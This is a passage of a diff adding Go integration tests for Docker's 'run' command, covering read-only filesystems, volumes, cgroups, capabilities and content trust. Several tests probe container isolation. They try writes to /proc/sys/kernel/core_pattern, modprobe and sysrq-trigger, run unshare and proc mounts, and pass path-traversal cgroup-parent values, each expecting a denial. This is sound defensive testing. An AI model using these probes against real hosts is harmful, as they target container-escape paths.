+func testReadOnlyFile(c *check.C, testPriv bool, filenames ...string) {
+	touch := "touch " + strings.Join(filenames, " ")
+	out, _, err := dockerCmdWithError("run", "--read-only", "--rm", "busybox", "sh", "-c", touch)
+	c.Assert(err, checker.NotNil)
+
+	for _, f := range filenames {
+		expected := "touch: " + f + ": Read-only file system"
+		c.Assert(out, checker.Contains, expected)
+	}
+
+	if !testPriv {
+		return
+	}
+
+	out, _, err = dockerCmdWithError("run", "--read-only", "--privileged", "--rm", "busybox", "sh", "-c", touch)
+	c.Assert(err, checker.NotNil)
+
+	for _, f := range filenames {
+		expected := "touch: " + f + ": Read-only file system"
+		c.Assert(out, checker.Contains, expected)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithReadonlyEtcHostsAndLinkedContainer(c *check.C) {
+	// Not applicable on Windows which does not support --link
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	dockerCmd(c, "run", "-d", "--name", "test-etc-hosts-ro-linked", "busybox", "top")
+
+	out, _ := dockerCmd(c, "run", "--read-only", "--link", "test-etc-hosts-ro-linked:testlinked", "busybox", "cat", "/etc/hosts")
+	if !strings.Contains(string(out), "testlinked") {
+		c.Fatal("Expected /etc/hosts to be updated even if --read-only enabled")
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithReadonlyRootfsWithDNSFlag(c *check.C) {
+	// Not applicable on Windows which does not support either --read-only or --dns.
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	out, _ := dockerCmd(c, "run", "--read-only", "--dns", "1.1.1.1", "busybox", "/bin/cat", "/etc/resolv.conf")
+	if !strings.Contains(string(out), "1.1.1.1") {
+		c.Fatal("Expected /etc/resolv.conf to be updated even if --read-only enabled and --dns flag used")
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithReadonlyRootfsWithAddHostFlag(c *check.C) {
+	// Not applicable on Windows which does not support --read-only
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	out, _ := dockerCmd(c, "run", "--read-only", "--add-host", "testreadonly:127.0.0.1", "busybox", "/bin/cat", "/etc/hosts")
+	if !strings.Contains(string(out), "testreadonly") {
+		c.Fatal("Expected /etc/hosts to be updated even if --read-only enabled and --add-host flag used")
+	}
+}
+
+func (s *DockerSuite) TestRunVolumesFromRestartAfterRemoved(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	runSleepingContainer(c, "--name=voltest", "-v", prefix+"/foo")
+	runSleepingContainer(c, "--name=restarter", "--volumes-from", "voltest")
+
+	// Remove the main volume container and restart the consuming container
+	dockerCmd(c, "rm", "-f", "voltest")
+
+	// This should not fail since the volumes-from were already applied
+	dockerCmd(c, "restart", "restarter")
+}
+
+// run container with --rm should remove container if exit code != 0
+func (s *DockerSuite) TestRunContainerWithRmFlagExitCodeNotEqualToZero(c *check.C) {
+	name := "flowers"
+	out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "ls", "/notexists")
+	if err == nil {
+		c.Fatal("Expected docker run to fail", out, err)
+	}
+
+	out, err = getAllContainers()
+	if err != nil {
+		c.Fatal(out, err)
+	}
+
+	if out != "" {
+		c.Fatal("Expected not to have containers", out)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithRmFlagCannotStartContainer(c *check.C) {
+	name := "sparkles"
+	out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "commandNotFound")
+	if err == nil {
+		c.Fatal("Expected docker run to fail", out, err)
+	}
+
+	out, err = getAllContainers()
+	if err != nil {
+		c.Fatal(out, err)
+	}
+
+	if out != "" {
+		c.Fatal("Expected not to have containers", out)
+	}
+}
+
+func (s *DockerSuite) TestRunPIDHostWithChildIsKillable(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	name := "ibuildthecloud"
+	dockerCmd(c, "run", "-d", "--pid=host", "--name", name, "busybox", "sh", "-c", "sleep 30; echo hi")
+
+	c.Assert(waitRun(name), check.IsNil)
+
+	errchan := make(chan error)
+	go func() {
+		if out, _, err := dockerCmdWithError("kill", name); err != nil {
+			errchan <- fmt.Errorf("%v:\n%s", err, out)
+		}
+		close(errchan)
+	}()
+	select {
+	case err := <-errchan:
+		c.Assert(err, check.IsNil)
+	case <-time.After(5 * time.Second):
+		c.Fatal("Kill container timed out")
+	}
+}
+
+func (s *DockerSuite) TestRunWithTooSmallMemoryLimit(c *check.C) {
+	// TODO Windows. This may be possible to enable once Windows supports
+	// memory limits on containers
+	testRequires(c, DaemonIsLinux)
+	// this memory limit is 1 byte less than the min, which is 4MB
+	// https://github.com/docker/docker/blob/v1.5.0/daemon/create.go#L22
+	out, _, err := dockerCmdWithError("run", "-m", "4194303", "busybox")
+	if err == nil || !strings.Contains(out, "Minimum memory limit allowed is 4MB") {
+		c.Fatalf("expected run to fail when using too low a memory limit: %q", out)
+	}
+}
+
+func (s *DockerSuite) TestRunWriteToProcAsound(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	_, code, err := dockerCmdWithError("run", "busybox", "sh", "-c", "echo 111 >> /proc/asound/version")
+	if err == nil || code == 0 {
+		c.Fatal("standard container should not be able to write to /proc/asound")
+	}
+}
+
+func (s *DockerSuite) TestRunReadProcTimer(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	out, code, err := dockerCmdWithError("run", "busybox", "cat", "/proc/timer_stats")
+	if code != 0 {
+		return
+	}
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.Trim(out, "\n ") != "" {
+		c.Fatalf("expected to receive no output from /proc/timer_stats but received %q", out)
+	}
+}
+
+func (s *DockerSuite) TestRunReadProcLatency(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	// some kernels don't have this configured so skip the test if this file is not found
+	// on the host running the tests.
+	if _, err := os.Stat("/proc/latency_stats"); err != nil {
+		c.Skip("kernel doesn't have latency_stats configured")
+		return
+	}
+	out, code, err := dockerCmdWithError("run", "busybox", "cat", "/proc/latency_stats")
+	if code != 0 {
+		return
+	}
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.Trim(out, "\n ") != "" {
+		c.Fatalf("expected to receive no output from /proc/latency_stats but received %q", out)
+	}
+}
+
+func (s *DockerSuite) TestRunReadFilteredProc(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace)
+
+	testReadPaths := []string{
+		"/proc/latency_stats",
+		"/proc/timer_stats",
+		"/proc/kcore",
+	}
+	for i, filePath := range testReadPaths {
+		name := fmt.Sprintf("procsieve-%d", i)
+		shellCmd := fmt.Sprintf("exec 3<%s", filePath)
+
+		out, exitCode, err := dockerCmdWithError("run", "--privileged", "--security-opt", "apparmor=docker-default", "--name", name, "busybox", "sh", "-c", shellCmd)
+		if exitCode != 0 {
+			return
+		}
+		if err != nil {
+			c.Fatalf("Open FD for read should have failed with permission denied, got: %s, %v", out, err)
+		}
+	}
+}
+
+func (s *DockerSuite) TestMountIntoProc(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	_, code, err := dockerCmdWithError("run", "-v", "/proc//sys", "busybox", "true")
+	if err == nil || code == 0 {
+		c.Fatal("container should not be able to mount into /proc")
+	}
+}
+
+func (s *DockerSuite) TestMountIntoSys(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, NotUserNamespace)
+	dockerCmd(c, "run", "-v", "/sys/fs/cgroup", "busybox", "true")
+}
+
+func (s *DockerSuite) TestRunUnshareProc(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace)
+
+	// In this test goroutines are used to run test cases in parallel to prevent the test from taking a long time to run.
+	errChan := make(chan error)
+
+	go func() {
+		name := "acidburn"
+		out, _, err := dockerCmdWithError("run", "--name", name, "--security-opt", "seccomp=unconfined", "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "--mount-proc=/proc", "mount")
+		if err == nil ||
+			!(strings.Contains(strings.ToLower(out), "permission denied") ||
+				strings.Contains(strings.ToLower(out), "operation not permitted")) {
+			errChan <- fmt.Errorf("unshare with --mount-proc should have failed with 'permission denied' or 'operation not permitted', got: %s, %v", out, err)
+		} else {
+			errChan <- nil
+		}
+	}()
+
+	go func() {
+		name := "cereal"
+		out, _, err := dockerCmdWithError("run", "--name", name, "--security-opt", "seccomp=unconfined", "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc")
+		if err == nil ||
+			!(strings.Contains(strings.ToLower(out), "mount: cannot mount none") ||
+				strings.Contains(strings.ToLower(out), "permission denied") ||
+				strings.Contains(strings.ToLower(out), "operation not permitted")) {
+			errChan <- fmt.Errorf("unshare and mount of /proc should have failed with 'mount: cannot mount none' or 'permission denied', got: %s, %v", out, err)
+		} else {
+			errChan <- nil
+		}
+	}()
+
+	/* Ensure still fails if running privileged with the default policy */
+	go func() {
+		name := "crashoverride"
+		out, _, err := dockerCmdWithError("run", "--privileged", "--security-opt", "seccomp=unconfined", "--security-opt", "apparmor=docker-default", "--name", name, "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc")
+		if err == nil ||
+			!(strings.Contains(strings.ToLower(out), "mount: cannot mount none") ||
+				strings.Contains(strings.ToLower(out), "permission denied") ||
+				strings.Contains(strings.ToLower(out), "operation not permitted")) {
+			errChan <- fmt.Errorf("privileged unshare with apparmor should have failed with 'mount: cannot mount none' or 'permission denied', got: %s, %v", out, err)
+		} else {
+			errChan <- nil
+		}
+	}()
+
+	for i := 0; i < 3; i++ {
+		err := <-errChan
+		if err != nil {
+			c.Fatal(err)
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunPublishPort(c *check.C) {
+	// TODO Windows: This may be possible once Windows moves to libnetwork and CNM
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "test", "--expose", "8080", "busybox", "top")
+	out, _ := dockerCmd(c, "port", "test")
+	out = strings.Trim(out, "\r\n")
+	if out != "" {
+		c.Fatalf("run without --publish-all should not publish port, out should be nil, but got: %s", out)
+	}
+}
+
+// Issue #10184.
+func (s *DockerSuite) TestDevicePermissions(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	const permissions = "crw-rw-rw-"
+	out, status := dockerCmd(c, "run", "--device", "/dev/fuse:/dev/fuse:mrw", "busybox:latest", "ls", "-l", "/dev/fuse")
+	if status != 0 {
+		c.Fatalf("expected status 0, got %d", status)
+	}
+	if !strings.HasPrefix(out, permissions) {
+		c.Fatalf("output should begin with %q, got %q", permissions, out)
+	}
+}
+
+func (s *DockerSuite) TestRunCapAddCHOWN(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=CHOWN", "busybox", "sh", "-c", "adduser -D -H newuser && chown newuser /home && echo ok")
+
+	if actual := strings.Trim(out, "\r\n"); actual != "ok" {
+		c.Fatalf("expected output ok received %s", actual)
+	}
+}
+
+// https://github.com/docker/docker/pull/14498
+func (s *DockerSuite) TestVolumeFromMixedRWOptions(c *check.C) {
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "true")
+
+	// TODO Windows: Temporary check - remove once TP5 support is dropped
+	if daemonPlatform != "windows" || windowsDaemonKV >= 14350 {
+		dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true")
+	}
+	dockerCmd(c, "run", "--volumes-from", "parent:rw", "--name", "test-volumes-2", "busybox", "true")
+
+	if daemonPlatform != "windows" {
+		mRO, err := inspectMountPoint("test-volumes-1", prefix+slash+"test")
+		c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point"))
+		if mRO.RW {
+			c.Fatalf("Expected RO volume was RW")
+		}
+	}
+
+	mRW, err := inspectMountPoint("test-volumes-2", prefix+slash+"test")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point"))
+	if !mRW.RW {
+		c.Fatalf("Expected RW volume was RO")
+	}
+}
+
+func (s *DockerSuite) TestRunWriteFilteredProc(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace)
+
+	testWritePaths := []string{
+		/* modprobe and core_pattern should both be denied by generic
+		 * policy of denials for /proc/sys/kernel. These files have been
+		 * picked to be checked as they are particularly sensitive to writes */
+		"/proc/sys/kernel/modprobe",
+		"/proc/sys/kernel/core_pattern",
+		"/proc/sysrq-trigger",
+		"/proc/kcore",
+	}
+	for i, filePath := range testWritePaths {
+		name := fmt.Sprintf("writeprocsieve-%d", i)
+
+		shellCmd := fmt.Sprintf("exec 3>%s", filePath)
+		out, code, err := dockerCmdWithError("run", "--privileged", "--security-opt", "apparmor=docker-default", "--name", name, "busybox", "sh", "-c", shellCmd)
+		if code != 0 {
+			return
+		}
+		if err != nil {
+			c.Fatalf("Open FD for write should have failed with permission denied, got: %s, %v", out, err)
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunNetworkFilesBindMount(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	expected := "test123"
+
+	filename := createTmpFile(c, expected)
+	defer os.Remove(filename)
+
+	nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"}
+
+	for i := range nwfiles {
+		actual, _ := dockerCmd(c, "run", "-v", filename+":"+nwfiles[i], "busybox", "cat", nwfiles[i])
+		if actual != expected {
+			c.Fatalf("expected %s be: %q, but was: %q", nwfiles[i], expected, actual)
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunNetworkFilesBindMountRO(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	filename := createTmpFile(c, "test123")
+	defer os.Remove(filename)
+
+	nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"}
+
+	for i := range nwfiles {
+		_, exitCode, err := dockerCmdWithError("run", "-v", filename+":"+nwfiles[i]+":ro", "busybox", "touch", nwfiles[i])
+		if err == nil || exitCode == 0 {
+			c.Fatalf("run should fail because bind mount of %s is ro: exit code %d", nwfiles[i], exitCode)
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, SameHostDaemon, DaemonIsLinux, UserNamespaceROMount)
+
+	filename := createTmpFile(c, "test123")
+	defer os.Remove(filename)
+
+	nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"}
+
+	for i := range nwfiles {
+		_, exitCode := dockerCmd(c, "run", "-v", filename+":"+nwfiles[i], "--read-only", "busybox", "touch", nwfiles[i])
+		if exitCode != 0 {
+			c.Fatalf("run should not fail because %s is mounted writable on read-only root filesystem: exit code %d", nwfiles[i], exitCode)
+		}
+	}
+
+	for i := range nwfiles {
+		_, exitCode, err := dockerCmdWithError("run", "-v", filename+":"+nwfiles[i]+":ro", "--read-only", "busybox", "touch", nwfiles[i])
+		if err == nil || exitCode == 0 {
+			c.Fatalf("run should fail because %s is mounted read-only on read-only root filesystem: exit code %d", nwfiles[i], exitCode)
+		}
+	}
+}
+
+func (s *DockerTrustSuite) TestTrustedRun(c *check.C) {
+	// Windows does not support this functionality
+	testRequires(c, DaemonIsLinux)
+	repoName := s.setupTrustedImage(c, "trusted-run")
+
+	// Try run
+	runCmd := exec.Command(dockerBinary, "run", repoName)
+	s.trustedCmd(runCmd)
+	out, _, err := runCommandWithOutput(runCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted run: %s\n%s\n", err, out)
+	}
+
+	if !strings.Contains(string(out), "Tagging") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Try untrusted run to ensure we pushed the tag to the registry
+	runCmd = exec.Command(dockerBinary, "run", "--disable-content-trust=true", repoName)
+	s.trustedCmd(runCmd)
+	out, _, err = runCommandWithOutput(runCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted run: %s\n%s", err, out)
+	}
+
+	if !strings.Contains(string(out), "Status: Downloaded") {
+		c.Fatalf("Missing expected output on trusted run with --disable-content-trust:\n%s", out)
+	}
+}
+
+func (s *DockerTrustSuite) TestUntrustedRun(c *check.C) {
+	// Windows does not support this functionality
+	testRequires(c, DaemonIsLinux)
+	repoName := fmt.Sprintf("%v/dockercliuntrusted/runtest:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	dockerCmd(c, "push", repoName)
+	dockerCmd(c, "rmi", repoName)
+
+	// Try trusted run on untrusted tag
+	runCmd := exec.Command(dockerBinary, "run", repoName)
+	s.trustedCmd(runCmd)
+	out, _, err := runCommandWithOutput(runCmd)
+	if err == nil {
+		c.Fatalf("Error expected when running trusted run with:\n%s", out)
+	}
+
+	if !strings.Contains(string(out), "does not have trust data for") {
+		c.Fatalf("Missing expected output on trusted run:\n%s", out)
+	}
+}
+
+func (s *DockerTrustSuite) TestRunWhenCertExpired(c *check.C) {
+	// Windows does not support this functionality
+	testRequires(c, DaemonIsLinux)
+	c.Skip("Currently changes system time, causing instability")
+	repoName := s.setupTrustedImage(c, "trusted-run-expired")
+
+	// Certificates have 10 years of expiration
+	elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11)
+
+	runAtDifferentDate(elevenYearsFromNow, func() {
+		// Try run
+		runCmd := exec.Command(dockerBinary, "run", repoName)
+		s.trustedCmd(runCmd)
+		out, _, err := runCommandWithOutput(runCmd)
+		if err == nil {
+			c.Fatalf("Error running trusted run in the distant future: %s\n%s", err, out)
+		}
+
+		if !strings.Contains(string(out), "could not validate the path to a trusted root") {
+			c.Fatalf("Missing expected output on trusted run in the distant future:\n%s", out)
+		}
+	})
+
+	runAtDifferentDate(elevenYearsFromNow, func() {
+		// Try run
+		runCmd := exec.Command(dockerBinary, "run", "--disable-content-trust", repoName)
+		s.trustedCmd(runCmd)
+		out, _, err := runCommandWithOutput(runCmd)
+		if err != nil {
+			c.Fatalf("Error running untrusted run in the distant future: %s\n%s", err, out)
+		}
+
+		if !strings.Contains(string(out), "Status: Downloaded") {
+			c.Fatalf("Missing expected output on untrusted run in the distant future:\n%s", out)
+		}
+	})
+}
+
+func (s *DockerTrustSuite) TestTrustedRunFromBadTrustServer(c *check.C) {
+	// Windows does not support this functionality
+	testRequires(c, DaemonIsLinux)
+	repoName := fmt.Sprintf("%v/dockerclievilrun/trusted:latest", privateRegistryURL)
+	evilLocalConfigDir, err := ioutil.TempDir("", "evilrun-local-config-dir")
+	if err != nil {
+		c.Fatalf("Failed to create local temp dir")
+	}
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted push: %s\n%s", err, out)
+	}
+	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Try run
+	runCmd := exec.Command(dockerBinary, "run", repoName)
+	s.trustedCmd(runCmd)
+	out, _, err = runCommandWithOutput(runCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted run: %s\n%s", err, out)
+	}
+
+	if !strings.Contains(string(out), "Tagging") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Kill the notary server, start a new "evil" one.
+	s.not.Close()
+	s.not, err = newTestNotary(c)
+	if err != nil {
+		c.Fatalf("Restarting notary server failed.")
+	}
+
+	// In order to make an evil server, lets re-init a client (with a different trust dir) and push new data.
+	// tag an image and upload it to the private registry
+	dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName)
+
+	// Push up to the new server
+	pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err = runCommandWithOutput(pushCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted push: %s\n%s", err, out)
+	}
+	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	// Now, try running with the original client from this new trust server. This should fail because the new root is invalid.
+	runCmd = exec.Command(dockerBinary, "run", repoName)
+	s.trustedCmd(runCmd)
+	out, _, err = runCommandWithOutput(runCmd)
+
+	if err == nil {
+		c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out)
+	}
+	if !strings.Contains(out, "could not rotate trust to a new trusted root") {
+		c.Fatalf("Missing expected output on trusted run:\n%s", out)
+	}
+}
+
+func (s *DockerSuite) TestPtraceContainerProcsFromHost(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), check.IsNil)
+	pid1 := inspectField(c, id, "State.Pid")
+
+	_, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/net", pid1))
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestAppArmorDeniesPtrace(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, SameHostDaemon, Apparmor, DaemonIsLinux)
+
+	// Run through 'sh' so we are NOT pid 1. Pid 1 may be able to trace
+	// itself, but pid>1 should not be able to trace pid1.
+	_, exitCode, _ := dockerCmdWithError("run", "busybox", "sh", "-c", "sh -c readlink /proc/1/ns/net")
+	if exitCode == 0 {
+		c.Fatal("ptrace was not successfully restricted by AppArmor")
+	}
+}
+
+func (s *DockerSuite) TestAppArmorTraceSelf(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux, SameHostDaemon, Apparmor)
+
+	_, exitCode, _ := dockerCmdWithError("run", "busybox", "readlink", "/proc/1/ns/net")
+	if exitCode != 0 {
+		c.Fatal("ptrace of self failed.")
+	}
+}
+
+func (s *DockerSuite) TestAppArmorDeniesChmodProc(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, SameHostDaemon, Apparmor, DaemonIsLinux, NotUserNamespace)
+	_, exitCode, _ := dockerCmdWithError("run", "busybox", "chmod", "744", "/proc/cpuinfo")
+	if exitCode == 0 {
+		// If our test failed, attempt to repair the host system...
+		_, exitCode, _ := dockerCmdWithError("run", "busybox", "chmod", "444", "/proc/cpuinfo")
+		if exitCode == 0 {
+			c.Fatal("AppArmor was unsuccessful in prohibiting chmod of /proc/* files.")
+		}
+	}
+}
+
+func (s *DockerSuite) TestRunCapAddSYSTIME(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+
+	dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=SYS_TIME", "busybox", "sh", "-c", "grep ^CapEff /proc/self/status | sed 's/^CapEff:\t//' | grep ^0000000002000000$")
+}
+
+// run create container failed should clean up the container
+func (s *DockerSuite) TestRunCreateContainerFailedCleanUp(c *check.C) {
+	// TODO Windows. This may be possible to enable once link is supported
+	testRequires(c, DaemonIsLinux)
+	name := "unique_name"
+	_, _, err := dockerCmdWithError("run", "--name", name, "--link", "nothing:nothing", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf("Expected docker run to fail!"))
+
+	containerID, err := inspectFieldWithError(name, "Id")
+	c.Assert(err, checker.NotNil, check.Commentf("Expected not to have this container: %s!", containerID))
+	c.Assert(containerID, check.Equals, "", check.Commentf("Expected not to have this container: %s!", containerID))
+}
+
+func (s *DockerSuite) TestRunNamedVolume(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name=test", "-v", "testing:"+prefix+"/foo", "busybox", "sh", "-c", "echo hello > "+prefix+"/foo/bar")
+
+	out, _ := dockerCmd(c, "run", "--volumes-from", "test", "busybox", "sh", "-c", "cat "+prefix+"/foo/bar")
+	c.Assert(strings.TrimSpace(out), check.Equals, "hello")
+
+	out, _ = dockerCmd(c, "run", "-v", "testing:"+prefix+"/foo", "busybox", "sh", "-c", "cat "+prefix+"/foo/bar")
+	c.Assert(strings.TrimSpace(out), check.Equals, "hello")
+}
+
+func (s *DockerSuite) TestRunWithUlimits(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "--name=testulimits", "--ulimit", "nofile=42", "busybox", "/bin/sh", "-c", "ulimit -n")
+	ul := strings.TrimSpace(out)
+	if ul != "42" {
+		c.Fatalf("expected `ulimit -n` to be 42, got %s", ul)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithCgroupParent(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+
+	cgroupParent := "test"
+	name := "cgroup-test"
+
+	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
+	if err != nil {
+		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
+	}
+	cgroupPaths := parseCgroupPaths(string(out))
+	if len(cgroupPaths) == 0 {
+		c.Fatalf("unexpected output - %q", string(out))
+	}
+	id, err := getIDByName(name)
+	c.Assert(err, check.IsNil)
+	expectedCgroup := path.Join(cgroupParent, id)
+	found := false
+	for _, path := range cgroupPaths {
+		if strings.HasSuffix(path, expectedCgroup) {
+			found = true
+			break
+		}
+	}
+	if !found {
+		c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithCgroupParentAbsPath(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+
+	cgroupParent := "/cgroup-parent/test"
+	name := "cgroup-test"
+	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
+	if err != nil {
+		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
+	}
+	cgroupPaths := parseCgroupPaths(string(out))
+	if len(cgroupPaths) == 0 {
+		c.Fatalf("unexpected output - %q", string(out))
+	}
+	id, err := getIDByName(name)
+	c.Assert(err, check.IsNil)
+	expectedCgroup := path.Join(cgroupParent, id)
+	found := false
+	for _, path := range cgroupPaths {
+		if strings.HasSuffix(path, expectedCgroup) {
+			found = true
+			break
+		}
+	}
+	if !found {
+		c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths)
+	}
+}
+
+// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /.
+func (s *DockerSuite) TestRunInvalidCgroupParent(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+
+	cgroupParent := "../../../../../../../../SHOULD_NOT_EXIST"
+	cleanCgroupParent := "SHOULD_NOT_EXIST"
+	name := "cgroup-invalid-test"
+
+	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
+	if err != nil {
+		// XXX: This may include a daemon crash.
+		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
+	}
+
+	// We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue.
+	if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) {
+		c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!")
+	}
+
+	cgroupPaths := parseCgroupPaths(string(out))
+	if len(cgroupPaths) == 0 {
+		c.Fatalf("unexpected output - %q", string(out))
+	}
+	id, err := getIDByName(name)
+	c.Assert(err, check.IsNil)
+	expectedCgroup := path.Join(cleanCgroupParent, id)
+	found := false
+	for _, path := range cgroupPaths {
+		if strings.HasSuffix(path, expectedCgroup) {
+			found = true
+			break
+		}
+	}
+	if !found {
+		c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths)
+	}
+}
+
+// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /.
+func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	testRequires(c, DaemonIsLinux)
+
+	cgroupParent := "/../../../../../../../../SHOULD_NOT_EXIST"
+	cleanCgroupParent := "/SHOULD_NOT_EXIST"
+	name := "cgroup-absolute-invalid-test"
+
+	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
+	if err != nil {
+		// XXX: This may include a daemon crash.
